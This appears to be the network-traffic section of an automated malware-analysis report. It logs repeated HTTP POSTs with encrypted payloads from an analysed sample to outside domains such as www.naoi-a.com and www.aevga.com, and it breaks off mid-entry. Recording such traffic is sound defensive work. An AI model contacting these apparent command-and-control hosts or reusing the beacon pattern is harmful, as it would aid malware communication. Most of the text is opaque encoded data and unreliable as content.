OcHhymnUU8h4oVkFOJKTjYIc9YwH2tQJrcXA3VMsTy1CTlwmC+CcV61pvUAXKV141bBKwIJBmVrWvvinxpMHul7Lmaq3DsiNM455v8oZ65hUujLRKb85lbZmDXjEMcSEFcLAR+0ZDTSk0nloxy5CwuonGxUsaPSUy9o8lRIJcnnfuUBz0G1taLKMaheQgu7J8ZW+MoZszFoEqsKmdgwT5r9x5JapnklihwvgUMflYJJJR2LOKcRMip43PVcNMkyw/O3v2TcN6uGv3ZvfV8HIfw9Yu2VZ+Ww60v4YaG5KGS1so+x/WxexgCiegHAxKrJg56uUx5JyTNyude1xuqVur+VQcXfWmhVSh+E/eyN/MIumGNxMNm8SxAVzxM6i+SP0yFVofwFFkve4HU9bMHC+cdKC0+kh2OusU76q4e6OyT7JTuP54TvdWWXf5mNvSvbVgaVdPfmxrnykdPlIl2ZzwP6fjchGIaV4x9ptkyJ6PZxwoV3fI2XvayvWllwbiybKQVcDXLO9dBK6oUo/xjWYcjPIV6HIZ1pXtStiu2WJ/1hPcj2qYgHczA8=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 72 4c 42 64 6d 78 6f 36 61 38 68 34 57 4b 49 4c 50 55 4b 52 7a 31 33 65 71 69 6f 4b 70 4f 54 2f 37 68 56 73 55 66 6e 55 6d 52 51 4e 50 4a 49 59 61 37 53 35 57 4f 42 78 51 4c 50 53 6b 77 6f 5a 49 4b 2f 78 32 43 54 66 2f 55 71 37 6f 43 6b 67 39 62 37 6b 2f 71 54 73 74 62 6d 68 6f 57 43 31 76 6c 38 7a 52 46 63 39 68 69 2f 32 55 4a 58 6d 70 6a 62 57 39 74 70 7a 4f 42 66 36 41 75 49 36 79 75 38 4f 2f 52 66 59 2b 4e 30 39 57 32 44 51 42 34 50 75 42 46 6e 39 49 59 66 55 67 6a 78 4d 5a 6e 62 4c 4e 58 50 44 2b 6e 6f 34 62 68 48 51 73 2f 63 33 6c 4d 48 36 4f 36 39 63 46 46 6c 6c 69 38 37 42 34 51 63 4c 61 39 71 6a 42 47 39 75 67 35 68 36 32 33 54 6a 6a 42 4d 31 6f 7a 2b 64 68 78 4a 33 4f 4b 71 61 4a 36 37 6e 41 64 43 43 75 4b 78 54 34 52 58 4d 4f 4f 72 44 32 66 45 4c 7a 67 68 57 71 4c 4e 41 4f 6b 47 45 48 46 6f 32 2f 4d 78 56 44 46 6f 73 6e 33 41 50 54 30 51 6a 31 49 49 4e 76 2f 42 74 45 64 2b 4c 31 66 52 42 6a 4a 56 31 69 77 39 6c 72 51 72 35 74 49 64 49 48 65 75 33 65 37 78 49 76 59 47 74 6a 6e 77 72 2b 4b 79 4c 68 4f 63 4d 65 59 37 5a 35 71 46 55 39 39 4e 68 78 51 4b 70 63 32 53 38 72 6a 30 56 69 46 4d 61 50 57 59 4d 56 43 61 34 4a 6e 74 65 55 42 49 76 6d 4c 52 36 42 6e 68 66 47 44 4e 47 38 64 6d 2b 67 37 67 78 31 66 34 79 61 6a 73 65 45 2f 48 6f 30 6e 49 50 34 6a 2f 4a 54 34 51 47 39 4b 72 65 4f 2f 39 34 41 32 76 41 6b 46 75 67 30 42 73 64 7a 64 42 65 4e 67 6d 76 46 57 77 32 38 73 68 39 42 4b 71 6c 48 48 6f 52 2b 69 70 58 73 66 66 77 72 50 69 7a 69 32 53 6a 62 55 72 54 53 45 46 39 61 73 66 65 44 6a 39 62 4e 6c 55 53 62 6b 58 35 61 6c 4c 59 44 49 58 78 6f 65 39 39 63 4c 79 69 49 73 47 70 69 69 4e 30 67 69 6a 43 32 68 68 43 56 39 57 7a 33 4f 67 52 58 6e 78 52 72 65 72 4b 45 6d 32 51 51 7a 78 37 47 4b 6d 6f 55 4d 46 67 4f 59 68 69 69 35 59 3d Data Ascii: rLBdmxo6a8h4WKILPUKRz13eqioKpOT/7hVsUfnUmRQNPJIYa7S5WOBxQLPSkwoZIK/x2CTf/Uq7oCkg9b7k/qTstbmhoWC1vl8zRFc9hi/2UJXmpjbW9tpzOBf6AuI6yu8O/RfY+N09W2DQB4PuBFn9IYfUgjxMZnbLNXPD+no4bhHQs/c3lMH6O69cFFlli87B4QcLa9qjBG9ug5h623TjjBM1oz+dhxJ3OKqaJ67nAdCCuKxT4RXMOOrD2fELzghWqLNAOkGEHFo2/MxVDFosn3APT0Qj1IINv/BtEd+L1fRBjJV1iw9lrQr5tIdIHeu3e7xIvYGtjnwr+KyLhOcMeY7Z5qFU99NhxQKpc2S8rj0ViFMaPWYMVCa4JnteUBIvmLR6BnhfGDNG8dm+g7gx1f4yajseE/Ho0nIP4j/JT4QG9KreO/94A2vAkFug0BsdzdBeNgmvFWw28sh9BKqlHHoR+ipXsffwrPizi2SjbUrTSEF9asfeDj9bNlUSbkX5alLYDIXxoe99cLyiIsGpiiN0gijC2hhCV9Wz3OgRXnxRrerKEm2QQzx7GKmoUMFgOYhii5Y=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 45 4c 54 5a 72 51 55 6b 64 4d 69 5a 30 69 53 41 4c 4d 55 72 4e 58 36 2b 42 61 33 54 64 7a 75 33 43 5a 6d 66 4e 4a 70 6a 64 71 79 4f 58 72 31 2f 61 4d 69 73 65 51 35 64 46 51 72 57 7a 79 4b 38 6b 6b 44 66 6f 5a 56 31 4c 6e 46 76 7a 72 37 50 50 4a 4b 2f 4c 4c 42 59 4b 6a 70 46 79 6c 48 49 4b 44 57 39 50 69 50 56 62 58 4e 62 66 42 66 50 38 30 7a 2b 75 59 53 68 58 62 5a 57 59 68 41 42 33 73 47 71 36 66 49 76 7a 4f 61 6f 43 51 59 6e 32 59 74 5a 7a 33 6b 4d 35 36 65 73 58 42 78 47 46 38 5a 4b 61 4b 48 45 7a 4c 6e 73 50 78 30 49 55 37 46 43 61 58 55 4a 62 72 4f 50 46 35 55 58 78 56 52 67 73 4f 63 41 36 6c 6f 66 31 7a 6d 74 44 4a 72 64 76 68 34 2b 4d 46 4e 38 5a 7a 73 35 4f 47 62 35 7a 32 4c 66 39 55 42 58 73 4a 59 4c 46 48 78 2f 67 55 69 72 56 52 61 79 30 65 58 35 66 68 72 76 6e 55 32 34 6d 58 63 72 43 32 4f 79 4a 34 42 32 73 51 65 43 64 6d 56 2b 4c 2f 73 54 68 6f 62 63 54 52 31 6b 4e 5a 71 36 37 55 38 73 49 37 49 46 36 4b 32 4a 42 6e 71 48 57 50 45 73 58 73 38 51 6a 49 70 78 4b 61 4c 4a 6c 41 62 42 32 2f 55 50 55 36 4b 6b 45 68 69 36 70 78 61 72 34 43 70 74 49 32 73 73 6b 6d 58 4f 78 45 6b 61 6e 34 61 35 77 33 73 78 4b 62 49 67 79 73 77 2f 78 48 4b 56 43 71 6e 70 62 6d 4f 38 53 45 4c 58 38 52 39 44 6b 4e 6e 69 43 61 55 74 6f 52 70 4b 31 62 5a 4d 6d 66 53 50 39 37 58 44 6c 37 71 44 47 46 33 62 56 46 4e 51 2f 30 30 75 77 38 35 73 6f 4a 42 51 76 6a 4b 62 64 7a 66 43 4f 59 31 61 6a 46 45 61 43 32 50 57 6a 75 53 71 42 79 55 45 7a 46 51 54 6e 49 46 6f 69 43 33 69 54 6a 64 77 4e 7a 34 2f 67 77 48 38 63 6d 67 78 65 6f 30 4d 4e 75 74 78 75 6a 43 72 39 4f 6c 33 4e 70 73 4a 30 31 6c 74 6a 61 43 44 44 4b 50 68 4b 50 46 52 75 36 47 74 4b 30 71 38 62 61 45 67 33 77 43 75 62 47 68 42 69 48 55 46 34 79 54 43 7a 31 76 4f 59 78 69 6b 38 51 4e 56 44 51 3d 3d Data Ascii: ELTZrQUkdMiZ0iSALMUrNX6+Ba3Tdzu3CZmfNJpjdqyOXr1/aMiseQ5dFQrWzyK8kkDfoZV1LnFvzr7PPJK/LLBYKjpFylHIKDW9PiPVbXNbfBfP80z+uYShXbZWYhAB3sGq6fIvzOaoCQYn2YtZz3kM56esXBxGF8ZKaKHEzLnsPx0IU7FCaXUJbrOPF5UXxVRgsOcA6lof1zmtDJrdvh4+MFN8Zzs5OGb5z2Lf9UBXsJYLFHx/gUirVRay0eX5fhrvnU24mXcrC2OyJ4B2sQeCdmV+L/sThobcTR1kNZq67U8sI7IF6K2JBnqHWPEsXs8QjIpxKaLJlAbB2/UPU6KkEhi6pxar4CptI2sskmXOxEkan4a5w3sxKbIgysw/xHKVCqnpbmO8SELX8R9DkNniCaUtoRpK1bZMmfSP97XDl7qDGF3bVFNQ/00uw85soJBQvjKbdzfCOY1ajFEaC2PWjuSqByUEzFQTnIFoiC3iTjdwNz4/gwH8cmgxeo0MNutxujCr9Ol3NpsJ01ltjaCDDKPhKPFRu6GtK0q8baEg3wCubGhBiHUF4yTCz1vOYxik8QNVDQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheCookie: snkz=191.96.150.209; btst=ae131e7aa937662b5fde5704c0a367ca|191.96.150.209|1694755566|1694755566|0|1|0Data Raw: 4d 42 35 54 71 55 6a 72 42 38 6a 6a 59 59 4a 43 69 35 61 63 68 72 74 5a 32 42 7a 51 33 79 48 64 2f 43 72 4c 32 56 42 34 41 67 67 4d 39 54 43 64 37 6b 41 46 4d 37 54 74 51 64 64 50 73 45 62 59 79 4e 37 6b 41 4e 79 42 4e 4e 2f 4d 6a 47 69 5a 4f 2b 75 6e 79 51 32 6e 6f 42 52 38 68 79 2b 37 48 56 54 4f 37 4a 76 61 5a 71 6a 4f 75 54 5a 33 52 5a 47 66 59 32 35 2f 68 43 78 56 52 69 45 54 49 69 6d 36 37 73 38 73 2f 69 45 75 64 78 48 66 6e 33 6a 53 35 53 39 6c 67 53 76 32 51 70 62 46 56 6b 49 4f 41 72 73 52 34 41 5a 43 35 4f 50 73 2b 4f 61 4e 54 63 37 35 57 46 77 52 4f 7a 59 4c 79 48 61 77 2f 39 6b 41 79 65 71 62 41 68 4c 4d 7a 76 55 45 68 35 77 73 7a 6f 4f 31 66 78 72 32 52 39 62 58 51 75 54 6d 57 77 4a 4d 58 55 46 64 68 67 68 67 77 73 5a 67 39 7a 6a 38 58 4e 63 45 30 35 50 59 4a 6f 49 51 62 6b 37 36 72 63 51 44 4b 74 7a 78 34 6e 51 73 35 7a 37 57 39 75 37 7a 53 4c 65 73 59 4a 55 78 64 38 76 54 42 54 61 6e 70 69 70 61 2b 67 2b 55 6d 4e 53 6e 2b 36 45 5a 39 43 50 4e 65 53 43 39 44 61 42 61 75 66 46 75 35 43 64 34 34 41 4f 35 41 4e 66 78 36 67 69 58 47 73 43 59 2b 56 31 79 52 4f 73 57 44 76 67 69 42 52 6f 75 61 68 69 77 46 6a 6f 51 55 69 6f 58 6a 78 31 42 75 74 73 33 78 55 59 37 38 63 31 31 66 33 58 6c 64 74 74 4b 79 36 64 55 2f 4a 61 74 65 2b 32 38 6d 64 54 34 44 6e 35 46 33 30 30 48 54 6e 7a 4a 53 72 6d 54 39 47 38 68 37 74 66 49 33 64 31 4b 56 50 44 35 75 53 77 33 6e 44 2b 44 69 63 71 48 46 57 35 54 7a 67 69 50 38 5a 73 4f 7a 35 6f 50 77 62 75 38 34 62 63 49 30 31 37 32 59 58 37 33 73 35 30 4a 4a 2b 66 56 4b 77 45 54 2b 50 51 35 65 38 49 47 54 48 31 45 47 70 49 68 5a 67 77 4d 4f 43 31 4b 6a 6b 44 79 44 6d 62 66 36 72 6a 52 Data Ascii: MB5TqUjrB8jjYYJCi5achrtZ2BzQ3yHd/CrL2VB4AggM9TCd7kAFM7TtQddPsEbYyN7kANyBNN/MjGiZO+unyQ2noBR8hy+7HVTO7JvaZqjOuTZ3RZGfY25/hCxVRiETIim67s8s/iEudxHfn3jS5S9lgSv2QpbFVkIOArsR4AZC5OPs+OaNTc75WFwROzYLyHaw/9kAyeqbAhLMzvUEh5wszoO1fxr2R9bXQuTmWwJMXUFdhghgwsZg9zj8XNcE05PYJoIQbk76rcQDKtzx4nQs5z7W9u7zSLesYJUxd8vTBTanpipa+g+UmNSn+6EZ9CPNeSC9DaBaufFu5Cd44AO5ANfx6giXGsCY+V1yROsWDvgiBRouahiwFjoQUioXjx1Buts3xUY78c11f3XldttKy6dU/Jate+28mdT4Dn5F300HTnzJSrmT9G8h7tfI3d1KVPD5uSw3nD+DicqHFW5TzgiP8ZsOz5oPwbu84bcI0172YX73s50JJ+fVKwET+PQ5e8IGTH1EGpIhZgwMOC1KjkDyDmbf6rjR
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 45 4c 54 5a 72 51 55 6b 64 4d 69 5a 30 69 53 41 4c 4d 55 72 4e 58 36 2b 42 61 33 54 64 7a 75 33 43 5a 6d 66 4e 4a 70 6a 64 71 79 4f 58 72 31 2f 61 4d 69 73 65 51 35 64 46 51 72 57 7a 79 4b 38 6b 6b 44 66 6f 5a 56 31 4c 6e 46 76 7a 72 37 50 50 4a 4b 2f 4c 4c 42 59 4b 6a 70 46 79 6c 48 49 4b 44 57 39 50 69 50 56 62 58 4e 62 66 42 66 50 38 30 7a 2b 75 59 53 68 58 62 5a 57 59 68 41 42 33 73 47 71 36 66 49 76 7a 4f 61 6f 43 51 59 6e 32 59 74 5a 7a 33 6b 4d 35 36 65 73 58 42 78 47 46 38 5a 4b 61 4b 48 45 7a 4c 6e 73 50 78 30 49 55 37 46 43 61 58 55 4a 62 72 4f 50 46 35 55 58 78 56 52 67 73 4f 63 41 36 6c 6f 66 31 7a 6d 74 44 4a 72 64 76 68 34 2b 4d 46 4e 38 5a 7a 73 35 4f 47 62 35 7a 32 4c 66 39 55 42 58 73 4a 59 4c 46 48 78 2f 67 55 69 72 56 52 61 79 30 65 58 35 66 68 72 76 6e 55 32 34 6d 58 63 72 43 32 4f 79 4a 34 42 32 73 51 65 43 64 6d 56 2b 4c 2f 73 54 68 6f 62 63 54 52 31 6b 4e 5a 71 36 37 55 38 73 49 37 49 46 36 4b 32 4a 42 6e 71 48 57 50 45 73 58 73 38 51 6a 49 70 78 4b 61 4c 4a 6c 41 62 42 32 2f 55 50 55 36 4b 6b 45 68 69 36 70 78 61 72 34 43 70 74 49 32 73 73 6b 6d 58 4f 78 45 6b 61 6e 34 61 35 77 33 73 78 4b 62 49 67 79 73 77 2f 78 48 4b 56 43 71 6e 70 62 6d 4f 38 53 45 4c 58 38 52 39 44 6b 4e 6e 69 43 61 55 74 6f 52 70 4b 31 62 5a 4d 6d 66 53 50 39 37 58 44 6c 37 71 44 47 46 33 62 56 46 4e 51 2f 30 30 75 77 38 35 73 6f 4a 42 51 76 6a 4b 62 64 7a 66 43 4f 59 31 61 6a 46 45 61 43 32 50 57 6a 75 53 71 42 79 55 45 7a 46 51 54 6e 49 46 6f 69 43 33 69 54 6a 64 77 4e 7a 34 2f 67 77 48 38 63 6d 67 78 65 6f 30 4d 4e 75 74 78 75 6a 43 72 39 4f 6c 33 4e 70 73 4a 30 31 6c 74 6a 61 43 44 44 4b 50 68 4b 50 46 52 75 36 47 74 4b 30 71 38 62 61 45 67 33 77 43 75 62 47 68 42 69 48 55 46 34 79 54 43 7a 31 76 4f 59 78 69 6b 38 51 4e 56 44 51 3d 3d Data Ascii: ELTZrQUkdMiZ0iSALMUrNX6+Ba3Tdzu3CZmfNJpjdqyOXr1/aMiseQ5dFQrWzyK8kkDfoZV1LnFvzr7PPJK/LLBYKjpFylHIKDW9PiPVbXNbfBfP80z+uYShXbZWYhAB3sGq6fIvzOaoCQYn2YtZz3kM56esXBxGF8ZKaKHEzLnsPx0IU7FCaXUJbrOPF5UXxVRgsOcA6lof1zmtDJrdvh4+MFN8Zzs5OGb5z2Lf9UBXsJYLFHx/gUirVRay0eX5fhrvnU24mXcrC2OyJ4B2sQeCdmV+L/sThobcTR1kNZq67U8sI7IF6K2JBnqHWPEsXs8QjIpxKaLJlAbB2/UPU6KkEhi6pxar4CptI2sskmXOxEkan4a5w3sxKbIgysw/xHKVCqnpbmO8SELX8R9DkNniCaUtoRpK1bZMmfSP97XDl7qDGF3bVFNQ/00uw85soJBQvjKbdzfCOY1ajFEaC2PWjuSqByUEzFQTnIFoiC3iTjdwNz4/gwH8cmgxeo0MNutxujCr9Ol3NpsJ01ltjaCDDKPhKPFRu6GtK0q8baEg3wCubGhBiHUF4yTCz1vOYxik8QNVDQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 72 4c 42 64 6d 78 6f 36 61 38 68 34 57 4b 49 4c 50 55 4b 52 7a 31 33 65 71 69 6f 4b 70 4f 54 2f 37 68 56 73 55 66 6e 55 6d 52 51 4e 50 4a 49 59 61 37 53 35 57 4f 42 78 51 4c 50 53 6b 77 6f 5a 49 4b 2f 78 32 43 54 66 2f 55 71 37 6f 43 6b 67 39 62 37 6b 2f 71 54 73 74 62 6d 68 6f 57 43 31 76 6c 38 7a 52 46 63 39 68 69 2f 32 55 4a 58 6d 70 6a 62 57 39 74 70 7a 4f 42 66 36 41 75 49 36 79 75 38 4f 2f 52 66 59 2b 4e 30 39 57 32 44 51 42 34 50 75 42 46 6e 39 49 59 66 55 67 6a 78 4d 5a 6e 62 4c 4e 58 50 44 2b 6e 6f 34 62 68 48 51 73 2f 63 33 6c 4d 48 36 4f 36 39 63 46 46 6c 6c 69 38 37 42 34 51 63 4c 61 39 71 6a 42 47 39 75 67 35 68 36 32 33 54 6a 6a 42 4d 31 6f 7a 2b 64 68 78 4a 33 4f 4b 71 61 4a 36 37 6e 41 64 43 43 75 4b 78 54 34 52 58 4d 4f 4f 72 44 32 66 45 4c 7a 67 68 57 71 4c 4e 41 4f 6b 47 45 48 46 6f 32 2f 4d 78 56 44 46 6f 73 6e 33 41 50 54 30 51 6a 31 49 49 4e 76 2f 42 74 45 64 2b 4c 31 66 52 42 6a 4a 56 31 69 77 39 6c 72 51 72 35 74 49 64 49 48 65 75 33 65 37 78 49 76 59 47 74 6a 6e 77 72 2b 4b 79 4c 68 4f 63 4d 65 59 37 5a 35 71 46 55 39 39 4e 68 78 51 4b 70 63 32 53 38 72 6a 30 56 69 46 4d 61 50 57 59 4d 56 43 61 34 4a 6e 74 65 55 42 49 76 6d 4c 52 36 42 6e 68 66 47 44 4e 47 38 64 6d 2b 67 37 67 78 31 66 34 79 61 6a 73 65 45 2f 48 6f 30 6e 49 50 34 6a 2f 4a 54 34 51 47 39 4b 72 65 4f 2f 39 34 41 32 76 41 6b 46 75 67 30 42 73 64 7a 64 42 65 4e 67 6d 76 46 57 77 32 38 73 68 39 42 4b 71 6c 48 48 6f 52 2b 69 70 58 73 66 66 77 72 50 69 7a 69 32 53 6a 62 55 72 54 53 45 46 39 61 73 66 65 44 6a 39 62 4e 6c 55 53 62 6b 58 35 61 6c 4c 59 44 49 58 78 6f 65 39 39 63 4c 79 69 49 73 47 70 69 69 4e 30 67 69 6a 43 32 68 68 43 56 39 57 7a 33 4f 67 52 58 6e 78 52 72 65 72 4b 45 6d 32 51 51 7a 78 37 47 4b 6d 6f 55 4d 46 67 4f 59 68 69 69 35 59 3d Data Ascii: rLBdmxo6a8h4WKILPUKRz13eqioKpOT/7hVsUfnUmRQNPJIYa7S5WOBxQLPSkwoZIK/x2CTf/Uq7oCkg9b7k/qTstbmhoWC1vl8zRFc9hi/2UJXmpjbW9tpzOBf6AuI6yu8O/RfY+N09W2DQB4PuBFn9IYfUgjxMZnbLNXPD+no4bhHQs/c3lMH6O69cFFlli87B4QcLa9qjBG9ug5h623TjjBM1oz+dhxJ3OKqaJ67nAdCCuKxT4RXMOOrD2fELzghWqLNAOkGEHFo2/MxVDFosn3APT0Qj1IINv/BtEd+L1fRBjJV1iw9lrQr5tIdIHeu3e7xIvYGtjnwr+KyLhOcMeY7Z5qFU99NhxQKpc2S8rj0ViFMaPWYMVCa4JnteUBIvmLR6BnhfGDNG8dm+g7gx1f4yajseE/Ho0nIP4j/JT4QG9KreO/94A2vAkFug0BsdzdBeNgmvFWw28sh9BKqlHHoR+ipXsffwrPizi2SjbUrTSEF9asfeDj9bNlUSbkX5alLYDIXxoe99cLyiIsGpiiN0gijC2hhCV9Wz3OgRXnxRrerKEm2QQzx7GKmoUMFgOYhii5Y=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 6c 45 7a 51 4a 59 70 5a 67 4d 67 78 33 58 34 6f 37 58 73 61 54 55 33 66 61 4d 41 36 45 46 70 6d 58 6a 53 78 4f 49 47 50 49 4d 4a 37 32 38 2b 38 48 78 6f 6d 72 45 73 30 4c 50 48 65 71 4a 4c 47 76 4a 77 39 46 69 30 79 6e 41 6b 4d 44 30 2f 4b 4a 65 6a 30 79 39 35 73 35 50 2f 63 45 4a 33 48 37 51 75 75 4e 45 64 58 49 31 33 32 6c 75 48 4b 38 4e 44 77 65 50 2f 49 31 79 43 62 46 7a 65 61 58 46 52 6b 47 6b 6b 73 35 31 48 5a 41 73 52 65 57 69 4f 65 65 71 55 71 42 75 6f 33 4d 70 48 34 58 78 71 30 2f 2f 7a 48 6a 74 50 64 2f 62 33 58 6e 73 45 6d 69 7a 39 42 79 30 46 66 79 43 55 58 34 41 36 61 31 59 33 55 49 54 74 69 31 75 2b 54 44 6d 53 74 75 37 4b 71 47 70 71 4c 66 72 6a 69 6e 36 74 2f 6a 41 50 6a 74 71 72 7a 33 55 31 31 4c 57 48 73 7a 74 61 57 46 65 48 4b 67 55 2f 43 42 6e 57 73 67 79 44 56 2b 74 51 65 67 6a 39 61 30 59 57 5a 46 31 61 64 59 35 50 31 45 37 36 38 55 31 72 51 4b 61 46 4e 48 34 7a 54 66 4e 38 30 39 7a 46 34 55 73 4d 6c 79 6f 52 37 67 4a 43 34 76 78 7a 55 79 74 77 54 61 2f 38 4a 59 57 59 77 31 79 2f 43 43 46 2f 52 6f 58 4a 4f 38 41 69 75 59 61 79 62 73 4f 4f 74 39 2f 4f 4d 48 68 53 43 33 67 56 44 66 67 79 52 33 32 37 72 39 38 55 53 53 4d 6d 4d 41 33 39 56 73 46 4a 4e 44 32 46 72 6a 35 7a 55 39 5a 6a 70 58 44 37 6a 57 7a 77 58 54 47 52 68 44 2f 47 4f 4a 57 6c 37 56 2b 56 48 54 66 34 71 41 4e 4a 4d 62 7a 65 70 73 71 70 62 7a 78 6a 7a 6e 2b 6b 65 47 6f 54 38 2f 6a 5a 71 31 31 2f 4f 66 41 7a 57 62 49 6b 4f 41 5a 78 6c 4b 62 31 46 58 77 66 71 35 59 4a 39 45 39 2f 6f 45 64 36 41 68 30 6a 4f 70 33 53 57 34 71 69 63 39 2f 45 5a 64 34 6f 7a 55 64 6d 6e 32 49 70 48 56 37 53 5a 38 35 42 4d 68 42 6f 6f 67 63 59 73 41 34 44 2f 69 43 75 4f 4a 57 38 6d 71 31 77 78 7a 78 44 71 59 30 6f 66 49 64 39 48 79 2f 32 63 34 43 43 71 Data Ascii: lEzQJYpZgMgx3X4o7XsaTU3faMA6EFpmXjSxOIGPIMJ728+8HxomrEs0LPHeqJLGvJw9Fi0ynAkMD0/KJej0y95s5P/cEJ3H7QuuNEdXI132luHK8NDweP/I1yCbFzeaXFRkGkks51HZAsReWiOeeqUqBuo3MpH4Xxq0//zHjtPd/b3XnsEmiz9By0FfyCUX4A6a1Y3UITti1u+TDmStu7KqGpqLfrjin6t/jAPjtqrz3U11LWHsztaWFeHKgU/CBnWsgyDV+tQegj9a0YWZF1adY5P1E768U1rQKaFNH4zTfN809zF4UsMlyoR7gJC4vxzUytwTa/8JYWYw1y/CCF/RoXJO8AiuYaybsOOt9/OMHhSC3gVDfgyR327r98USSMmMA39VsFJND2Frj5zU9ZjpXD7jWzwXTGRhD/GOJWl7V+VHTf4qANJMbzepsqpbzxjzn+keGoT8/jZq11/OfAzWbIkOAZxlKb1FXwfq5YJ9E9/oEd6Ah0jOp3SW4qic9/EZd4ozUdmn2IpHV7SZ85BMhBoogcYsA4D/iCuOJW8mq1wxzxDqY0ofId9Hy/2c4CCq
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 2f 61 36 7a 52 57 73 53 65 63 69 48 52 56 41 70 51 6f 52 65 64 4e 54 48 51 38 59 78 74 58 2b 67 7a 2b 71 2b 37 73 44 30 35 48 75 66 6e 51 54 73 4b 67 37 58 35 49 52 78 73 32 4f 75 71 37 66 76 71 33 63 70 5a 51 61 36 63 6c 32 64 2f 2b 33 39 59 56 48 58 48 53 47 30 62 6b 46 33 43 5a 67 74 35 44 48 76 55 39 4f 43 47 46 37 45 34 4d 4a 55 4d 61 65 49 70 62 39 6f 6e 30 2f 7a 34 4f 71 4f 43 71 43 79 70 56 33 55 4d 37 45 7a 78 30 4d 32 4c 70 4d 34 72 66 54 50 7a 53 68 79 72 51 4e 6f 44 75 2b 72 73 59 48 52 76 76 6f 57 45 4a 52 6d 63 4c 47 49 43 59 42 33 4a 66 48 4b 58 53 4a 72 4c 6c 58 6a 48 4a 61 79 66 47 62 32 30 34 65 50 34 6d 4c 61 52 52 76 6a 49 4c 54 73 36 4a 39 45 36 38 46 35 4d 64 69 2f 49 50 58 46 5a 70 35 70 4a 2f 35 32 72 37 45 49 31 48 35 66 48 75 4c 47 76 58 76 36 56 37 4a 39 38 4b 46 76 2b 66 52 64 2f 73 32 65 64 46 47 4e 55 6f 65 6d 71 58 58 76 2f 43 4f 56 72 42 52 72 6a 70 47 42 32 4b 4a 4e 4f 54 6d 57 76 35 38 61 51 2b 50 75 63 6e 6b 6a 6f 65 58 72 7a 43 51 52 47 79 64 42 39 61 63 6f 68 52 5a 58 6a 6c 76 7a 4c 5a 2f 79 37 31 77 32 59 2f 36 42 75 65 54 75 31 54 53 2f 65 5a 6d 51 50 38 63 75 39 69 2b 76 79 39 39 51 6e 41 72 34 73 38 4d 66 78 79 57 6f 55 68 77 49 76 56 48 4c 4e 33 62 4e 39 49 37 67 4b 74 51 31 51 30 79 7a 56 62 66 48 36 51 48 58 50 2b 72 36 4f 69 52 5a 77 64 50 30 35 4f 73 53 73 47 79 68 63 2b 6b 52 34 79 67 72 46 6f 31 58 4f 31 57 52 38 4c 47 37 4b 64 63 49 76 4c 67 73 34 62 4f 47 62 66 37 70 4c 65 65 70 5a 34 38 61 6f 6c 34 72 65 6a 62 43 67 64 36 51 38 6f 4f 32 72 5a 71 46 59 5a 4b 71 70 76 48 65 6b 6b 48 33 6b 5a 51 6f 4b 64 6e 32 79 6b 53 65 Data Ascii: /a6zRWsSeciHRVApQoRedNTHQ8YxtX+gz+q+7sD05HufnQTsKg7X5IRxs2Ouq7fvq3cpZQa6cl2d/+39YVHXHSG0bkF3CZgt5DHvU9OCGF7E4MJUMaeIpb9on0/z4OqOCqCypV3UM7Ezx0M2LpM4rfTPzShyrQNoDu+rsYHRvvoWEJRmcLGICYB3JfHKXSJrLlXjHJayfGb204eP4mLaRRvjILTs6J9E68F5Mdi/IPXFZp5pJ/52r7EI1H5fHuLGvXv6V7J98KFv+fRd/s2edFGNUoemqXXv/COVrBRrjpGB2KJNOTmWv58aQ+PucnkjoeXrzCQRGydB9acohRZXjlvzLZ/y71w2Y/6BueTu1TS/eZmQP8cu9i+vy99QnAr4s8MfxyWoUhwIvVHLN3bN9I7gKtQ1Q0yzVbfH6QHXP+r6OiRZwdP05OsSsGyhc+kR4ygrFo1XO1WR8LG7KdcIvLgs4bOGbf7pLeepZ48aol4rejbCgd6Q8oO2rZqFYZKqpvHekkH3kZQoKdn2ykSe
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 6c 45 7a 51 4a 59 70 5a 67 4d 67 78 33 58 34 6f 37 58 73 61 54 55 33 66 61 4d 41 36 45 46 70 6d 58 6a 53 78 4f 49 47 50 49 4d 4a 37 32 38 2b 38 48 78 6f 6d 72 45 73 30 4c 50 48 65 71 4a 4c 47 76 4a 77 39 46 69 30 79 6e 41 6b 4d 44 30 2f 4b 4a 65 6a 30 79 39 35 73 35 50 2f 63 45 4a 33 48 37 51 75 75 4e 45 64 58 49 31 33 32 6c 75 48 4b 38 4e 44 77 65 50 2f 49 31 79 43 62 46 7a 65 61 58 46 52 6b 47 6b 6b 73 35 31 48 5a 41 73 52 65 57 69 4f 65 65 71 55 71 42 75 6f 33 4d 70 48 34 